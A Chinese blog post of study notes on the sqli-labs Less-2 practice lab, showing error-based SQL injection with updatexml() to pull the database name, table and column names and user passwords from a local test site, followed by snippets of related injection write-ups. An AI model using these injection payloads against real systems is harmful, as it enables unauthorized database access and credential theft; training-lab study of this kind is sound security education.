SQL练习(less-2)报错注入

最新推荐文章于 2024-09-01 23:33:10 发布
原创 最新推荐文章于 2024-09-01 23:33:10 发布 · 515 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql注入

本文详细介绍了SQL注入攻击中利用Updatexml函数进行数据库信息探测的过程,包括如何获取数据库名、表名、字段名以及敏感数据。通过构造特定的SQL语句,逐步揭示了数据库中的关键信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

本文为学习笔记,仅限学习交流
不得利用、从事危害国家或人民安全、荣誉和利益等活动

固定格式: Updatexml(1,concat(0×7e,b)
Updatexml(a,Xpath,b) 在文档a中,查找 Xpath 格式的内容 替换 b内容
Conact(a,b,c,…) 用来连接括号内的字符串

构造语句:union select updatexml(1,concat(0x7e,select database(),0x7e),1)

http://127.0.0.1/sqli/Less-2/index.php?id=1’
在这里插入图片描述
爆出数据库名:
http://127.0.0.1/sqli/Less-2/index.php?id=1 union select updatexml(1,concat(0x7e,(select database()),0x7e),1)%23
在这里插入图片描述
爆出当前数据库下的表名:
http://127.0.0.1/sqli/Less-2/index.php?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema =‘security’),0x7e),1) %23
在这里插入图片描述
爆出users表的字段
http://127.0.0.1/sqli/Less-2/index.php?id=-1 and updatexml(1,concat(0x7e,(select group_concat(column_name)frominformation_schema.columns where table_schema=‘security’ and table_name=‘users’),0x7e),1)%23
在这里插入图片描述
爆出账户名密码:
http://127.0.0.1/sql/Less-2/index.php?id=-1and updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1) %23
在这里插入图片描述
完成!

SQLi-LABS Less-1&&Less-2
m0_64898960的博客
04-09 386
SQLI-LABS
SQL注入实例(sqli-labs/less-8)
Thewei666的博客
08-05 449
确定闭合字符为单引号,并且正确页面与错误页面的显示不同。
LESS2sql注入
qq_44598397的博客
03-14 988
Less2 源码 输入:http://127.0.0.1/sqlilabs/Less-2/?id=2’ 输出错误: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server v ersion for the right syntax to use near ‘’ LIM...
sql注入-Less-2-4
dahege666的博客
04-03 395
Less-2 添加一个id,响应正常 将'(单引号)添加到数字中 我们得到了一个 Mysql 返回的错误,提示我们语法错误。 现在执行的查询语句如下: Select * from TABLE where id = 1’ ; 所以这里的单引号破坏了查询,导致抛出错误。因此我们得出的结果是,查询代码使用了整数。 Select * from TABLE where id = (so...
暑期练习web8:加了料的报错注入(实验吧)
qq_41618162的博客
08-17 1044
解题连接:ht=tp://ctf5.shiyanbar.com/web/baocuo/index.php 进入解题首页面就出现tips让我们post给username和password传值 随便传个值试试 只报了登陆失败的字样 换成username=’&password=5就说我有sql语法错误,说明这题是要考虑sql注入的 然后用burpsuite检测许多sql相关的词,看...
sqli-labs靶场第二关
gou1791241251的博客
12-19 823
传入id=1查看页面回显 第一步:判断注入类型。如字符型,数值型 传入单引号和双引号,或不传入参数进行测试。在末尾加入–+进行注入sql语句后面的代码 不传入单引号或双引号页面正常 第二步:判断表字段数 使用order by order by 3 时页面正常 order by 4时页面回显异常,所以有三个字段 第三步:使用联合查询获取数据库相关信息与查看页面回显位置 接下来查看数据库名和版本号 接下来通过mysql数据库中的information_schema数据中的tables表来查询所有
Sqli-labs Less17 报错注入
beiweixiaotian66的博客
07-25 411
一丢丢Sqli-labs小练习
【网络安全】-sql注入实战-sql-labs(1~10)
weixin_65311462的博客
09-01 1247
id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='数据库名' and table_name='表名' -- +id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='数据库名' -- +3.4 爆数据 :?
SQL注入sqli-labs第三关(less-3)
s_xcx_ah的博客
06-10 2534
sqli第三关简要步骤
sqli-labs关卡23(基于get提交的过滤注释符的报错注入)
zyh1588的博客
01-15 1289
小白回顾sql靶场23关
sql注入Less-2
qq_38595432的博客
09-16 290
sql="SELECT∗FROMusersWHEREid=sql = "SELECT * FROM users WHERE id=sql="SELECT∗FROMusersWHEREid=id LIMIT 0,1";http://192.168.200.26/Less-3/?id=-1? union select 1,2,database();–+使用id=-1 便可以显示union的内容了 使用–+注释掉 limit后面的内容group_concat(table_name) 去重SQL注入: 随便输入内容
Sqli-labs之Less-2
→_→
03-12 1421
Less-2 翻译:获取-基于错误-基于整数 欢迎Dhakkan 请输...
sqli-labs ---- Less-2
Nixawk
05-31 1177
[地址]: https://github.com/Audi-1/sqli-labs
sqli less-02
ANYOUZHEN的博客
04-30 442
输入id=1,回显正常,输入id=1',回显异常,接着输入id=1'--+ 输入id=1'--+仍然报错 其是整型(id=$id limit 0,1),然后不加单引号 猜测成功,我们用常规sql思路走走 ?id=1 order by 3--+ 我们发现表格只有3列 我们使用联合查询进行查找,由于整数型,我们删去’ 输入?id=-1 union select 1,2,3--+ 接着查询数据库?id=-1 union select 1,2,database()--+ ...
sql注入系列之Sqli-labs(less-2)
BetsyMyGirl的博客
11-30 1518
判断注入点 http://192.168.81.210/sqli/Less-2/?id=1’输入单引号发现出现了sql语句报错,可以知道单引号已经进入到数据库里执行了,语句类似于 select * from users where id =1' limit 0,1 因为正常的情况下,用户只能将搜索的参数传入到数据库里面进行查询,是不可能去修改查询语句的,上方的报错就是由于用户修改了查询的语句而引起的,将以上语句代入到自己的数据库里执行也是会报错的,因为多了一个单引号。 判断注入类型 输入1 and 1=1
SQLsqli-labs注入Less-2~4
Nuyoah的博客
12-13 521
Less-1相同,我们同样使用?id=1'看是否可以注入, 发现不可以,并且提示错误,我们可以知道,这里多加了一个引号,这就是与Less-1不同的地方,除此之外,以下步骤与Less-1相同 2.接下来我们使用 order by 查看有多少列 仍然有三列3.使用联合查询 union select 看有哪些数据可以回显 4.接下来查询所有数据库 5.继续查询表 6.再查询列 7.最后取出所有数据 ...
sql-libs less2 详解答案
小白巨白的博客
01-17 630
首先,判断是哪一种的注入类型——整数型错误 127.0.0.1/Less-2/?id=2 当进行注入的时候,由于在添加单引号的时候整体会发生变化,后部分采用注释将其含义进行消除可以发现对应的sql语句应该是 select * from user where id= 参数 所以可以在其后面进行添加和索引 通过group by 1,2,3的参数可以大致知道对应所有的列数,当自动添加到4时产生错误,所以我们应将 数目得到确定为3 当出现错误时,判断哪个错误地方可以进行注入 127.0.0.1/Less-2/?id
sqli-libs less1(union 字符注入)
weixin_42728957的博客
12-10 318
打开后,提示输入id并赋值 1、寻找注入点 输入?id=1返回数据,输入?id=1’报错,说明存在sql注入漏洞 根据报错信息,猜想输入参数的值被放到一对单引号之间。 猜测后台源码中存在类似于如下的数据库查询语句(可查看后台源码证实猜测): SELECT * FROM users WHERE id='$id' LIMIT 0,1 2、order by 查询该数据表中的字段数量 输入?id=1’ order by 3 --+ 正常; 输入?id=1’ order by 4 --+ 报错,说明该数据表中字
SQL注入报错注入法(基于Metasploitable2-Linux)
qq_43578780的博客
11-29 477
1、使用报错注入的条件 1):在数据查询时,网页没有查询输出的结果;但当输入错误时,网页上有输入错误的提示(其实就是在信息与数据库进行交互后,输入错误的信息时,网页会显示出来。) 2):其在网页上的具体情况,和解决的办法。 由于在输入正确时,其显示的结果不变。 故只能尝试在输入错误时,其显示会进行提示这一点进行交互。 方法:在输入正确时,没有数据的显示,也就是说即使构造语句成功我们也没有办法...
基于phpstudy 搭建sqllib靶场,使用union注入完成less1、less2 分别使用ex()报错和floor()报错注入完成less-5、使用updatexml()报错完成关卡less-6
最新发布
09-07
**less1 和 less2 (使用extract()函数报错注入)** 1. 找到可能存在SQL注入的输入点,例如表单提交或URL参数。 2. 尝试注入一些基本的SQL注入代码,比如单引号(')来检查是否存在SQL注入漏洞。 3. 如果存在注入点,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值